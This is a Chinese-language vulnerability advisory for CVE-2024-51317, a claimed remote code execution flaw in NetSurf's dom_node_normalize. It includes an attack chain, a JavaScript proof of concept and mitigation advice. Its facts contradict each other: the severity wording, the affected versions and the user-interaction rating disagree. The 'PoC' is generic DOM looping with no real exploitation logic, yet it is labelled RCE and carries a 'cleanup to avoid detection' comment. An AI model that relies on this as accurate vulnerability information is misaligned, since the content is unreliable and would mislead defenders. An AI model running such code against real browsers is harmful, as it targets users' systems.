CVE-2024-51317 NetSurf浏览器dom_node_normalize函数远程代码执行漏洞

漏洞信息

漏洞编号

CVE-2024-51317

漏洞类型

远程代码执行

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

NetSurf

漏洞概述

CVE-2024-51317是NetSurf浏览器3.11版本中的一个严重安全漏洞。该漏洞位于DOM处理模块的dom_node_normalize函数中，攻击者可以通过精心构造的恶意网页触发该函数中的内存处理错误，从而在目标系统上执行任意代码。NetSurf是一款开源的轻量级Web浏览器，广泛应用于嵌入式系统和资源受限的环境。由于该漏洞无需用户认证和交互即可被利用，且可通过网络远程触发，因此具有较高的安全风险。攻击者只需诱导用户访问恶意网页即可完成攻击链的建立，对用户系统安全构成严重威胁。

技术细节

该漏洞源于NetSurf浏览器3.11版本中dom_node_normalize函数的内存处理缺陷。在DOM规范中，dom_node_normalize函数用于合并相邻的文本节点以规范化文档树结构。攻击者可以通过在网页中注入特定的JavaScript代码或构造恶意的HTML内容，触发该函数的异常处理路径。当函数处理精心设计的DOM结构时，会产生内存越界访问或释放后使用等内存破坏问题，攻击者可利用这些内存错误实现代码执行。由于NetSurf浏览器使用libdom库进行DOM操作，该漏洞可能影响到libdom库的dom_node_normalize实现。攻击者可通过控制DOM节点的创建和操作顺序，触发漏洞条件并获取程序控制权。

攻击链分析

STEP 1

步骤1

攻击者创建包含恶意JavaScript代码的网页，利用DOM操作触发dom_node_normalize函数

STEP 2

步骤2

受害者使用NetSurf 3.11浏览器访问攻击者控制的恶意网页

STEP 3

步骤3

恶意代码通过反复操作DOM节点（创建、添加文本节点、调用normalize()）触发内存处理异常

STEP 4

步骤4

dom_node_normalize函数在处理精心构造的DOM结构时产生内存越界或释放后使用错误

STEP 5

步骤5

攻击者利用内存破坏漏洞控制程序执行流程，注入并执行任意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2024-51317 PoC - NetSurf dom_node_normalize RCE
// This PoC demonstrates triggering the vulnerability through DOM manipulation

// Create a div element
const targetDiv = document.createElement('div');
document.body.appendChild(targetDiv);

// Create text nodes to trigger normalize operation
const textNode1 = document.createTextNode('AAAA');
const textNode2 = document.createTextNode('BBBB');
const textNode3 = document.createTextNode('CCCC');

// Append text nodes to target element
targetDiv.appendChild(textNode1);
targetDiv.appendChild(textNode2);
targetDiv.appendChild(textNode3);

// Create nested structure to trigger vulnerability
for(let i = 0; i < 100; i++) {
    const newDiv = document.createElement('div');
    newDiv.appendChild(document.createTextNode('X'));
    targetDiv.appendChild(newDiv);
}

// Trigger normalize operation multiple times
for(let i = 0; i < 1000; i++) {
    targetDiv.normalize();
}

// Alternative trigger method using innerHTML manipulation
for(let i = 0; i < 500; i++) {
    targetDiv.innerHTML += '<span>DATA</span>';
    targetDiv.normalize();
}

// Cleanup to avoid detection
console.log('PoC executed');

影响范围

NetSurf < 3.11

防御指南

临时缓解措施

在官方修复版本发布之前，建议用户避免使用NetSurf浏览器访问不可信网站，特别是避免点击来历不明的链接。可以考虑暂时使用其他经过安全审计的浏览器替代方案。同时，企业用户应部署网络防火墙和入侵检测系统，对恶意网页流量进行监控和阻断。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2024-51317
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2024-51317
3 Details https://www.cvedetails.com/cve/CVE-2024-51317/
4 VulDB https://vuldb.com/cve/CVE-2024-51317
5 Link https://github.com/Fysac/netsurf-disclosure/tree/main/CVE-2024-51317
6 Link https://www.netsurf-browser.org/